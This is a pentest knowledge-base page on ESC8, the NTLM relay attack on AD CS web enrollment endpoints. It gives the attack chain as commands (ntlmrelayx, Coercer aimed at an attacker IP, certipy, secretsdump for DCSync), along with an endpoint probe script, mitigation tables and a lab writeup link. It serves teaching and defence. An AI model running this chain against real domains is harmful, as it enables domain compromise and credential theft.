# ESC8

**What is ESC8?**

ESC8 abuses **AD CS HTTP/HTTPS enrollment endpoints** that are vulnerable to **NTLM relay attacks** in their default configuration.

AD CS exposes several web-based enrollment interfaces via these server roles:

| Role                                            | Protocol   | Path                                           |
| ----------------------------------------------- | ---------- | ---------------------------------------------- |
| Web Enrollment                                  | HTTP/HTTPS | `/certsrv/`                                    |
| Certificate Enrollment Web Service (CES)        | HTTPS      | `/<CA_NAME>_CES_<AuthType>/service.svc`        |
| Certificate Enrollment Policy Web Service (CEP) | HTTPS      | `/ADPolicyProvider_CEP_<AuthType>/service.svc` |
| Network Device Enrollment Service (NDES)        | HTTP/HTTPS | `/certsrv/mscep/` and `/certsrv/mscep_admin/`  |

`<AuthType>` is `Kerberos`, `UsernamePassword` or `Certificate`; it is the Windows-integrated (`Kerberos`) CES/CEP instances that negotiate NTLM and are therefore relay targets.

> **Important:** HTTPS alone does **not** protect against NTLM relay. Plain HTTP has no equivalent of SMB or LDAP session signing, so the only thing that can tie a relayed NTLM exchange to the real client on these endpoints is **Extended Protection for Authentication (EPA)**[^1] (channel binding over TLS), and neither HTTPS nor EPA is enforced on them by default. A bare HTTP endpoint cannot be fixed with signing at all; it has to be closed by requiring TLS with EPA or by disabling NTLM on the endpoint.
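
A quick way to see which of these endpoints will actually accept a relayed NTLM exchange is to request each fixed path over both schemes and read the `WWW-Authenticate` challenge. The script below is an added example, not code from the original page: it assumes only `curl`, uses `ca.domain.corp` as a placeholder CA host, and checks the fixed paths only (the CES/CEP paths embed the CA name, so probe those by hand). `certipy find` reports the same exposure as ESC8 when run with domain credentials; this probe needs none.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): probe a CA's fixed-path web endpoints
# and report whether they offer NTLM/Negotiate over plain HTTP, over HTTPS, or not at all.
# Assumes curl; the CA hostname passed on the command line is a placeholder.
set -euo pipefail

# Fixed paths only: the CES/CEP paths embed the CA name, so they must be probed by hand.
ENDPOINTS=("/certsrv/" "/certsrv/mscep/" "/certsrv/mscep_admin/")

# assess_auth: read raw response headers on stdin and classify the challenge.
# A 401 carrying WWW-Authenticate: NTLM (or Negotiate, which falls back to NTLM
# unless NTLM is disabled) is what ntlmrelayx needs; over bare HTTP no channel
# binding can exist, so that case is relayable without any further check.
assess_auth() {
  local scheme=$1 status="" ntlm=0 line
  while IFS= read -r line; do
    line=${line%$'\r'}                      # strip CRLF line endings
    case "$line" in
      HTTP/*)                               # "HTTP/1.1 401 Unauthorized" -> 401
        status=${line#* }; status=${status%% *} ;;
      [Ww][Ww][Ww]-[Aa]uthenticate:*)
        case "$line" in *NTLM*|*Negotiate*) ntlm=1 ;; esac ;;
    esac
  done
  if [ "$status" = "401" ] && [ "$ntlm" = 1 ]; then
    [ "$scheme" = "http" ] && echo "NTLM-OVER-HTTP" || echo "NTLM-OVER-HTTPS"
  else
    echo "NO-NTLM-CHALLENGE"                # absent (404), Kerberos-only, or anonymous
  fi
}

# probe_ca: hit every fixed path over both schemes and print one line per result.
probe_ca() {
  local host=$1 scheme path headers result
  for scheme in http https; do
    for path in "${ENDPOINTS[@]}"; do
      # -D - dumps response headers to stdout; -k tolerates the CA's own TLS cert.
      if headers=$(curl -s -k -m 5 -o /dev/null -D - "$scheme://$host$path"); then
        result=$(printf '%s\n' "$headers" | assess_auth "$scheme")
      else
        result="UNREACHABLE"
      fi
      printf '%-5s %-22s %s\n' "$scheme" "$path" "$result"
    done
  done
}

# Usage: ./probe_adcs.sh ca.domain.corp
if [ -n "${1:-}" ]; then probe_ca "$1"; fi
```

`NTLM-OVER-HTTP` means relay is possible with no channel binding to worry about. `NTLM-OVER-HTTPS` on its own does not settle it: relay still works unless Extended Protection is set to Required on that IIS application, which you can only confirm from the IIS configuration or by attempting the relay.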

***

**How ESC8 Works**

The attack has two phases:

**1. Coerce NTLM authentication** from a target machine account (e.g. a Domain Controller) to your listener.

**2. Relay that authentication** to the CA's web enrollment interface and request a certificate from a template that allows:

* Domain computer enrollment
* Client Authentication EKU

Once you hold a valid certificate for the DC machine account, you can:

* Request a **TGT** for that account via PKINIT
* Retrieve its **NTLM hash** via UnPAC-the-Hash (THEFT5)
* From there → **DCSync** → full domain compromise

***

**Coercion Background**

Historically, **SpoolSample** (the MS-RPRN "printer bug") and **PetitPotam** (MS-EFSR coercion) were the go-to tools. Microsoft has since narrowed the most common vectors:

* The PetitPotam fix (CVE-2021-36942) blocked the *unauthenticated* `EfsRpcOpenFileRaw` call over the `lsarpc` pipe; authenticated EFS coercion through other MS-EFSR methods (such as `EfsRpcDuplicateEncryptionInfoFile`, used below) still works on many hosts
* The printer bug was never fixed as such; Microsoft's guidance is to disable the Print Spooler service on Domain Controllers, which removes SpoolSample wherever that guidance has been followed

However, **Coercer** enumerates and abuses many alternative RPC methods (MS-EFSR, MS-RPRN, MS-DFSNM, MS-FSRVP and others) that remain unpatched, so coercion is still viable in most environments: when one method is filtered, another usually works.

***

**Exploitation (Linux)**

**Step 1: Start the NTLM Relay Listener**

```bash
ntlmrelayx.py -t http://ca.domain.corp/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController'
```

> Target the `DomainController` template when relaying a DC machine account. For regular machine accounts, use `Machine` or another template with Client Authentication.

***

**Step 2: Coerce Authentication from the Target**

Using Coercer with a specific RPC method:

```bash
Coercer.py coerce -l <ATTACKER_IP> -t dc01.domain.corp -u username -p 'Password' -d domain.corp -v --filter-method-name "EfsRpcDuplicateEncryptionInfoFile"
```

* `-l`: your listener / relay host (the IP running `ntlmrelayx`, which listens on SMB/445 and HTTP/80 by default, so run it as root)
* `-t`: the target you want to coerce (typically the DC)
* `-u`/`-p`/`-d`: any valid domain credentials; EFS coercion has been authenticated since the PetitPotam fix, so a low-privileged user is enough
* `--filter-method-name`: specify a particular coercion method; useful when some are patched, or when you want one quiet call instead of Coercer's full sweep

The DC authenticates back to your listener over SMB, and `ntlmrelayx` forwards that NTLM exchange cross-protocol to the HTTP enrollment endpoint. SMB signing requirements only matter when relaying *to* SMB, so they do not get in the way here. If the relay succeeds, `ntlmrelayx` writes a `.pfx` certificate file for the relayed machine account into its working directory.

***

**Step 3: Authenticate with the Certificate**

Use `certipy` to authenticate with the obtained certificate via PKINIT and retrieve the NTLM hash (UnPAC-the-Hash):

```bash
certipy auth -pfx dc01.pfx -dc-ip <DC_IP>
```

This requests a TGT for the machine account, saves it as a `.ccache`, and prints the account's **NT hash**. PKINIT requires the KDC to hold its own certificate; if the DC answers `KDC_ERR_PADATA_TYPE_NOSUPP`, the relayed certificate is still usable for Schannel authentication to LDAPS (`certipy auth -pfx dc01.pfx -dc-ip <DC_IP> -ldap-shell`), which yields no hash but gives you an LDAP session as the DC account.

***

**Step 4: DCSync Using the Hash**

```bash
secretsdump.py -hashes :<NT_HASH> 'domain.corp/dc01$@dc01.domain.corp'
```

***

**Why This Works (Root Cause)**

| Condition                     | Details                                                                                                                            |
| ----------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| HTTP enrollment enabled       | The `/certsrv/` interface (or CES/NDES) is exposed and accepts NTLM authentication                                                 |
| No signing possible over HTTP | Unlike SMB and LDAP, HTTP has no NTLM session signing, so a relayed exchange is indistinguishable from a direct one                 |
| No EPA configured             | Channel binding is not required, so the server accepts an NTLM response carrying no binding to its TLS session, which is exactly what a response relayed from SMB looks like |
| Permissive template           | `DomainController` / `Machine` allows computer enrollment with Client Auth EKU                                                     |

**Mitigation**

| Fix                               | How                                                                                                                                                                   |
| --------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Disable HTTP enrollment if unused | Remove the Web Enrollment / CES / NDES roles, or restrict which hosts can reach them                                                                                   |
| Require HTTPS + EPA               | On the IIS applications hosting the endpoints, require SSL and set Extended Protection to *Required* (Microsoft's guidance in KB5005413)                               |
| Disable NTLM on the endpoints     | Allow only Kerberos (Negotiate without NTLM fallback) on the CA's IIS site, or block inbound NTLM to the CA with the *Restrict NTLM* policies                           |
| Restrict sensitive templates      | Secondary control only: the relayed identity is the DC itself, which legitimately holds enroll rights on `DomainController`, so template ACLs do not stop ESC8 against a DC |
| Reduce the coercion surface       | Apply the PetitPotam fix, disable Print Spooler on DCs, and use RPC filters to block the remaining MS-EFSR / MS-RPRN coercion methods                                  |

**Key Difference from ESC1**

|                 | ESC1                          | ESC8                              |
| --------------- | ----------------------------- | --------------------------------- |
| **Vector**      | Misconfigured template        | Misconfigured enrollment endpoint |
| **Requires**    | Enroll rights on template     | Network access + coercible target |
| **Auth method** | Direct certificate request    | NTLM relay                        |
| **Target**      | Any account you can enroll as | Machine accounts (coerced)        |

**Lab Writeup**

ESC8 was exploited in the **ShadowGate** machine on the [HackSmarter](https://www.hacksmarter.org/) platform.

> 📖 [ShadowGate Writeup -> Exploiting ESC8](https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/shadowgate-easy-hacksmarter#exploiting-esc8)

[^1]: EPA (channel binding) makes the client include a binding to its own TLS connection in the NTLM response, so the response is only valid on the connection that client established with the intended server. A response relayed from another protocol or connection carries the wrong (or no) binding and is rejected.

